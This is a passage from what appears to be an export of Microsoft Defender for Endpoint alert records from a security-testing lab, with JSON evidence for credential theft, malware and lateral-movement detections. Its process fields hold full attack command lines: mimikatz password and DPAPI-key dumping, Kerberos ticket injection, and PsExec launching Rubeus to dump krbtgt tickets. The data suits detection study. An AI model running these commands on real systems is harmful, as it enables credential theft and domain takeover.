"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-12-22T08:47:29.1097133Z",
"processId": 6584,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:51:24.16Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:29.1097133Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6584,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv8-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-12-22T08:47:29.7154534Z",
"processId": 3956,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:17:48.44Z | Suspicious | None | analyst | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T18:02:35.8466667Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.62Z | Benign | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 7,708 | PSEXESVC.exe | 2022-11-18T05:09:53.2034539Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638001153595901199_-1742865935 | e332b21a-1477-40dc-9267-e888f570a686 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:15:59.5901388Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:28.7769316Z | 2022-09-30T06:13:28.7769316Z | Suspicious service launched | A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device. | Execution | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | a5af9713-6eea-4d23-9bdc-9cab19f19092 | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "defender",
"domainName": "MSDXV2"
},
{
"accountName": "msdefender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:15:59.72Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-14T17:17:59.9661798Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 644,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-09-30T06:13:28.5321636Z",
"processId": 7308,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:15:59.72Z",
"fileName": "services.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-14T17:17:59.2357908Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": null,
"parentProcessId": 580,
"processCommandLine": "services.exe",
"processCreationTime": "2022-09-14T17:17:59.9661798Z",
"processId": 644,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "86b4d657f45a99da13732c5ad91faee64607074e",
"sha256": "751cd7ab78b18a2d8a55c47ca75b90a14234ac974d81be5f198d301b59183873",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:11:52.3166667Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 7,232 | cmd.exe /c whoami | 2022-11-21T02:07:15.1389846Z | 680 | 2022-11-10T17:17:06.0160973Z | services.exe | C:\Windows\System32 | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:13:00.48Z | Unknown | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 9,020 | "mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit | 2022-11-18T05:09:58.7146632Z | 4,976 | 2022-11-18T05:04:12.7150402Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:48:24.5933333Z | Suspicious | None | admin | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 9,268 | "net.exe" group "Domain Admins" /domain | 2022-12-22T08:47:23.149947Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
da638055769413201201_1744203370 | 049bd8f3-f5e5-407f-acc6-da2e1ca8c09b | 792 | MicrosoftDefenderForEndpoint | 2022-12-02T11:22:21.3201428Z | 2022-12-02T11:28:04.72Z | 2022-12-02T11:28:04.7045617Z | 2022-12-02T11:10:49.9477752Z | 2022-12-02T11:10:49.9477752Z | 'Emali' malware was detected | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | Resolved | Informational | 55 | SuccessfullyRemediated | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | Automation | null | Emali | [] | [
{
"aadDeviceId": "7711ee94-033f-495e-bc7a-53e7c1e57111",
"defenderAvStatus": "NotSupported",
"deviceDnsName": "internal.corp",
"firstSeen": "2022-09-19T08:40:31.865Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "252919130a29cc07e305c5c4ef99e5435b96b889",
"onboardingStatus": "Onboarded",
"osBuild": 22000,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Informational",
"tags": [
"Full auto",
"test Tag 2"
],
"version": "21H2",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10A",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "77cf6d06-c483-4fb3-a859-9bbd9c9ac8e2"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "252919130a29cc07e305c5c4ef99e5435b96b889",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-02T11:22:21.4Z",
"fileName": "5a47e113-c12a-6c07-22e6-70ca415962b0_1d90706ccf4329b",
"filePath": "c:\\programdata\\microsoft\\windows defender\\scans\\filesstash",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Blocked",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "46a01aa999843c55eb8ef7031c1db0d23ee30342",
"sha256": "670b00e90a7c9eb7ac6674441551e7764a8364c26e44dcc92474a9abcfac4c04",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:15:59.5333333Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:13:02.38Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 2,596 | "mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit | 2022-09-30T06:11:52.7127433Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | \Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T09:05:50.6533333Z | Benign | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:16:02.3033333Z | Malicious | None | ronhd | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T10:48:32.7466667Z | Suspicious | None | darol | prod.env | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:13:02.38Z | Benign | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:16:01.7066667Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043450911419285_2079932152 | e2aacca3-bd0e-4192-9c49-f32c9ab8d30c | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:11:31.1419497Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:10:00.653487Z | 2022-11-18T05:14:14.5635165Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | 47 | PartiallyInvestigated | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "corp.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:11:31.19Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:11:31.19Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-18T05:09:58.906007Z",
"processId": 7260,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:16:36.75Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:16:36.75Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-18T05:14:14.5100487Z",
"processId": 1228,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963026499465_1469012925 | 8c0c6243-34ce-45ce-a756-bfdc837ffa12 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:58:22.6499651Z | 2022-12-22T09:30:09.02Z | null | 2022-12-22T08:47:29.6780551Z | 2022-12-22T09:28:41.7266951Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | New | Medium | 62 | PendingApproval | null | null | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | null | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] | [
{
"aadUserId": null,
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.77Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.77Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:58:22.77Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "NotFound",
"remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.",
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:58:22.77Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:36:07.8466667Z | Suspicious | Active | admin | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 6,984 | PSEXESVC.exe | 2022-11-21T02:34:15.0073785Z | 680 | 2022-11-10T17:17:06.0160973Z | services.exe | C:\Windows\System32 | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T04:44:35.99Z | Suspicious | None | alice | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | 76866dde54ee3fa5bc8efefb9d44e6bf859973aa | afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91 | net.exe | C:\Windows\System32 | 17,344 | "net.exe" user /domain | 2022-11-18T04:38:44.7323003Z | 14,616 | 2022-11-14T04:36:16.5242809Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 83b06aa80899050e5d4132992e36b5b8f14b64e9 |
da638045930212799134_-270199467 | 67e70048-1466-4a32-83ce-4b5a518a3324 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:41.2799368Z | 2022-11-26T01:35:43.09Z | 2022-11-21T03:45:17.4759763Z | 2022-11-21T02:01:44.3120047Z | 2022-11-21T02:33:53.306249Z | Mimikatz credential theft tool | The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user. | CredentialAccess | Resolved | High | 50 | SuccessfullyRemediated | TruePositive | SecurityTesting | WindowsDefenderAv | 8cac979e-6dcc-44ad-8355-480eebaff1c1 | msftadmin@msdxv2.m365dpoc.com | null | Mimikatz | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.3233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
